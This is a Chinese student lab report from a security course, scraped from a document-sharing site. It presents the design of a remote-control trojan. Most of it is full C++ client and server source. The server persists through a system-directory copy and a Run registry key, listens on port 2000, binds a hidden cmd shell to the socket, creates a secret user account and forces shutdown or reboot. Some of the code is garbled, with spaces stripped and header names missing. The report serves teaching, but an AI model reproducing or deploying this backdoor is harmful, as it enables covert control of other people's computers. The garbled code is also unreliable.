远程控制与木马程序设计.docx
- 文档编号:6065386
- 上传时间:2023-05-09
- 格式:DOCX
- 页数:19
- 大小:187.85KB
远程控制与木马程序设计.docx
《远程控制与木马程序设计.docx》由会员分享,可在线阅读,更多相关《远程控制与木马程序设计.docx(19页珍藏版)》请在冰点文库上搜索。
远程控制与木马程序设计
信息系统安全与对抗技术实验报告
实验题目:
远程控制与木马程序设计
学生姓名:
班 级:
学 号:
所在院系:
专 业:
指导教师评价意见与成绩评定
质量等级
优 良 中 差
成绩
指导教师签字:
年月日
1实验题目
远程控制与木马程序设计。
2实验目的
(1)掌握远程控制的一般原理与类型,实现利用网络scoket套接字完成计算机远程通信过程,学生深入理解和掌握基于TCP/IP协议的网络通信概念、原理,以及网络客户机、服务器模型的结构概念。
(2)熟悉常用的WindowsAPI函数的用法,利用C++或VB语言实现木马程序的设计。
3实验条件和环境
操作系统:
windowsxp
编译环境:
VC6.0
4实验方法(系统功能、结构设计,软件流程图等)
4.1软件的功能结构图如下
4.2后门技术
后门是一种可以绕过安全性控制而获得对程序或系统访问权的隐蔽程序或方法。
利用来建立隐蔽通道,甚至植入隐蔽的恶意程序,达到非法访问或窃取、篡改、伪造、破坏数据等目的。
现在后门多指系统被入侵后被安装的具有控制系统权限的程序,通过它黑客可以远程控制系统。
4.3总体流程
本章木马实例是通过C/S运行模式并结合进程与匿名管道技术来实现的,主体分为两部分:
即客户端和服务端木马程序。
其原理为服务端程序在目标计算机中采用自动运行模式,并打开2000端口进行监听,当客户端向服务端主动提出连接请求,服务端木马程序就会自动运行,来应答客户端的请求,从而建立连接,服务段木马程序根据客户端的指令而执行相应的操作
4.4软件流程图如下
5实验结果及结论
客户端运行后如下图所示:
1、输入“add”命令后,创建用户成功
服务器端提示命令成功
用命令行查看用户情况
用户“yaoxiangwen”已经成功创建
2、输入”shutdown”后,电脑自动关闭成功
3、输入”reset”后,电脑自动重启
4、输入”close”后,光驱关闭
5、输入”open”后,光驱自动打开
6、输入”shell”后,查看任务管理器如下图
Cmd命令行已经被创建
7、输入quit后,服务器端成功退出
8、重启系统后,服务器端成功自动启动,说明软件开机具有自启动功能。
6附录:
程序清单及说明
程序清单:
Client.cpp//客户端代码
Server.cpp//服务器端代码
程序代码及说明:
//Client.cpp文件
#include
#include
#include
usingnamespacestd;
#pragmacomment(lib,"Ws2_32")
//将注释wsock32放置到lib文件中,否则需要加载
#defineMAXSIZE2048//每次可以接收的最大字节
#defineSEND_PORT2000//与木马程序连接的端口为2000
structsockaddr_inClientAddr;//对方的地址端口信息
SOCKETsock;//定义套接字变量,为全局变量
DWORDstartSock()//建立套接字功能模块
{
WSADATAWSAData;//将WSAData的数据类型声明为WSADATA
if(WSAStartup(MAKEWORD(2,2),&WSAData)!
=0)
{
//MAKEWORD(2,2)预定义Winsock版本,初始化套接字
printf("sockinitfail");
return(-1);
}
sock=socket(AF_INET,SOCK_STREAM,0);
//连接对方
return1;
}
intmain(intargc,char*argv[])
{
u_intnumbyte;
charbuf[MAXSIZE];//传送数据的缓冲区
charip[100];
cout<<"请输入要连接的IP地址"< cin>>ip; startSock();//调用建立套接字功能函数 ClientAddr.sin_family=AF_INET;//协议类型是INET ClientAddr.sin_port=htons(SEND_PORT);//连接对方2000端口 ClientAddr.sin_addr.s_addr=inet_addr(ip);//连接对方的IP地址 connect(sock,(structsockaddr*)&ClientAddr,sizeof(structsockaddr)); printf("------------远程控制木马程序菜单-------------\r\n"); printf("add--建立Windows系统的秘密帐号\r\n"); printf("shutdown--关闭Windows计算机\r\n"); printf("reset--重新启动Windows计算机\r\n"); printf("close--关闭光驱\r\n"); printf("open--打开光驱\r\n"); printf("shell--建立cmd进程\r\n"); printf("quit--退出系统\r\n"); printf("BIT----------gaoping-----------\r\n"); while (1) { buf[0]='\0'; scanf("%s",buf);//输入控制指令 intiLen=strlen(buf); buf[iLen]=0xa; buf[iLen+1]='\0';//要求控制指令串最后为回车符,以示结束 numbyte=send(sock,buf,strlen(buf),0);//发出控制指令 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } numbyte=recv(sock,buf,MAXSIZE,0);//接收服务端发来的提示符 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } buf[numbyte]='\0'; printf("%s",buf);//显示服务端发来的提示符 if(strcmp(buf,"quit")==0) { closesocket(sock); return0; } } return0; } //Server.cpp文件 #include #include #include #include #include usingnamespacestd; #include #pragmacomment(lib,"Ws2_32") //将注释wsock32放置到lib文件中,否则需要加载 #pragmacomment(lib,"Winmm.lib")//光驱控制函数mciSendString()所需的库 #defineRECV_PORT2000//木马服务端对外响应的端口 #definePATH200//程序自启动的最大路径 SOCKETsock1,sock2; //sock1为服务端程序自身建立的套接字 //sock2为服务端与客户端建立响应后的套接字 intg1; charBuff[1024],cmd[1024];//缓冲区 DWORDstartSock()//建立套接字功能模块 { WSADATAWSAData;//将WSAData的数据类型声明为WSADATA if(WSAStartup(MAKEWORD(2,2),&WSAData)! =0) { //MAKEWORD(2,2)预定义Winsock版本,初始化套接字 printf("sockinitfail"); return(-1); } sock1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); //建立套接字,为TCP/IP、流式格式 structsockaddr_inserverAddr;//保存套接字地址的结构体 serverAddr.sin_family=AF_INET;//规定使用IPv4协议 serverAddr.sin_port=htons(RECV_PORT);//响应端口 serverAddr.sin_addr.s_addr=ADDR_ANY; //建立IP地址,ADDR_ANY可使用任意IP地址连接 g1=bind(sock1,(sockaddr*)&serverAddr,sizeof(serverAddr)); //绑定端口与套接字 g1=listen(sock1,5);//等待监听,最大可接受5个连接请求 intserverAddrSize=sizeof(serverAddr); sock2=accept(sock1,(sockaddr*)&serverAddr,&serverAddrSize); //如果客户请求2000端口,接受连接,并返回sock2套接字 return1; } intcmdshell(SOCKETsock)//建立cmd进程功能模块 { STARTUPINFOstartinfo;//控制进程的主窗口的显示方式 ZeroMemory(&startinfo,sizeof(startinfo)); startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; //决定本结构的每一个成员是否起作用 startinfo.wShowWindow=SW_HIDE;//窗口显示模式,隐藏格式 startinfo.hStdInput=startinfo.hStdOutput=startinfo.hStdError=(void*)sock; //标准输入输出管道 charcmdsystem[]="cmd";//cmd进程 PROCESS_INFORMATIONProcessInformation;//指向进程信息结构的指针 intg2; //下面为建立进程过程 g2=CreateProcess(NULL,cmdsystem,NULL,NULL,1,0,NULL,NULL,&startinfo,&ProcessInformation); //建立一个cmd.exe进程与相应的输入输出管道 WaitForSingleObject(ProcessInformation.hProcess,INFINITE);//等待子进程退出 TerminateProcess(ProcessInformation.hProcess,0); //在一个子进程中强制结束其他的进程 CloseHandle(ProcessInformation.hProcess);//关闭子进程句柄 return1; } DWORDstartExeFile()//自启动程序功能模块 { charExeFile[PATH];//木马程序缓冲区 charTempPath[PATH];//系统目录缓冲区 intg3; GetModuleFileName(NULL,ExeFile,PATH);//得到当前文件名 GetSystemDirectory(TempPath,PATH);//得到系统目录 strcat(TempPath,"\\server.exe");//拷贝到系统文件夹名为server.exe g3=CopyFile(ExeFile,TempPath,FALSE); HKEYkey;//关键字句柄 if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS) {//创建和打开一个关键字 RegSetValueEx(key,"server",0,REG_SZ,(BYTE*)TempPath,lstrlen(TempPath)); //在RUN键下建立一个server键,为该木马的路径 RegCloseKey(key);//关闭并保存 } return1; } DWORDOpen_CDROM()//打开光驱程序功能模块 { mciSendString("setcdaudiodooropen",NULL,0,NULL); //多媒体控制函数 return1; } DWORDClose_CDROM()//关闭光驱程序功能模块 {mciSendString("Setcdaudiodoorclosedwait",NULL,1,NULL); //多媒体控制函数 return1; } DWORDshutdownwin2k()//关闭Win2K程序功能模块 { HANDLEhToken; TOKEN_PRIVILEGEStkp; //Windows2K中需要设置调用进程的权限,当获取该权限后才能关闭计算机的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1;//设置一个权限 tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0); return1; } DWORDshutdownwin98()//关闭Win98程序功能模块 { ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0); return1; } DWORDresetwin98()//重新启动Win98程序功能模块 { ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); return1; } DWORDresetwin2k()//重新启动Win2K程序功能模块 { HANDLEhToken; TOKEN_PRIVILEGEStkp; //Windows2K系列,需要设置调用进程的权限,获得权限才能进行重新启动计算机的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1;//设置一个权限 tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); return1; } DWORDadduser()//建立秘密帐号程序功能模块 { WinExec("netuseryaoxiangwen0123456789/add",SW_HIDE); //建立秘密帐号: yaoxiangwen为用户帐号,0123456789为密码 return1; } //下面为主函数,通过调用各个功能模块来实现木马功能 intmain() { startExeFile();// startSock(); unsignedlongByteRead=0; while (1) { send(sock2,"远程控制系统,请输入你的选择! \n\rcmd>",sizeof("欢迎进入木马远程控制系统,请输入你的选择! \n\rcmd>"),0); ZeroMemory(cmd,1024);//初始化cmd[]缓冲区,用来装客户端发来的指令 ByteRead=0;//接收客户端发来的指令字节数 while(ByteRead<200)//下面是接收客户端发来控制字程序段 { if(recv(sock2,Buff,1,0)==SOCKET_ERROR)//控制字在Buff缓冲区中 { closesocket(sock2); return0; } cmd[ByteRead]=Buff[0]; if(Buff[0]==0xa||Buff[0]==0xd) {//如果控制字最后是回车符表示结束标志,cmd[]数组最后一位为0 cmd[ByteRead]=0; break; } ByteRead++;//指令字节计数 } if(strcmp(cmd,"open")==0) { Open_CDROM();//调用打开光驱模块程序 send(sock2,"OK\n\rcmd>",sizeof("OK\n\rcmd>"),0); } elseif(strcmp(cmd,"close")==0) { Close_CDROM();//调用关闭光驱模块程序 send(sock2,"OK\n\rcmd>",sizeof("OK\n\rcmd>"),0); } elseif(strcmp(cmd,"shell")==0) { cmdshell(sock2);//调用CMD进程模块程序 send(sock2,"CreatethecmdShellOK\n\rcmd>",sizeof("CreatethecmdShellOK\n\rcmd>"),0); } elseif(strcmp(cmd,"shutdown98")==0) { shutdownwin98();//调用关闭Win98系统计算机模块程序 send(sock2,"shutdownthewindows98OK\n\rcmd>",sizeof("shutdownthewindows98OK\n\rcmd>"),0); } elseif(strcmp(cmd,"shutdown")==0) { shutdownwin2k();//调用关闭Win2K系统计算机模块程序 send(sock2,"shutdownthewindows2kOK\n\rcmd>",sizeof("shutdownthewindows2kOK\n\rcmd>"),0); } elseif(strcmp(cmd,"reset98")==0) { resetwin98();//调用启动Win98系统计算机模块程序 send(sock2,"resetthewindows98OK\n\rcmd>",sizeof("resetthewindows98OK\n\rcmd>"),0); } elseif(strcmp(cmd,"reset")==0) { resetwin2k();//调用启动Win2K系统计算机模块程序 send(sock2,"resetthewindows2kOK\n\rcmd>",sizeof("resetthewindows2kOK\n\rcmd>"),0); } elseif(strcmp(cmd,"add")==0) { adduser();//调用建立秘密帐号模块程序 send(sock2,"netuseryaoxiangwen0123456789/addOK\n\rcmd>",sizeof("netuserxxdkgao/addOK\n\rcmd>"),0); } elseif(strcmp(cmd,"quit")==0) { //退出木马,并关闭套接字 closesocket(sock2); exit(0); } else { send(sock2,"Badcommand,Pleaseinputthewordtryagain\n\rcmd>",sizeof("Badcommand,Pleaseinputthewordtryagain\n\rcmd>"),0); }//显示输入有误,重新输入 Sleep(10);//延时 } return1; }
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 远程 控制 木马程序 设计
![提示](https://static.bingdoc.com/images/bang_tan.gif)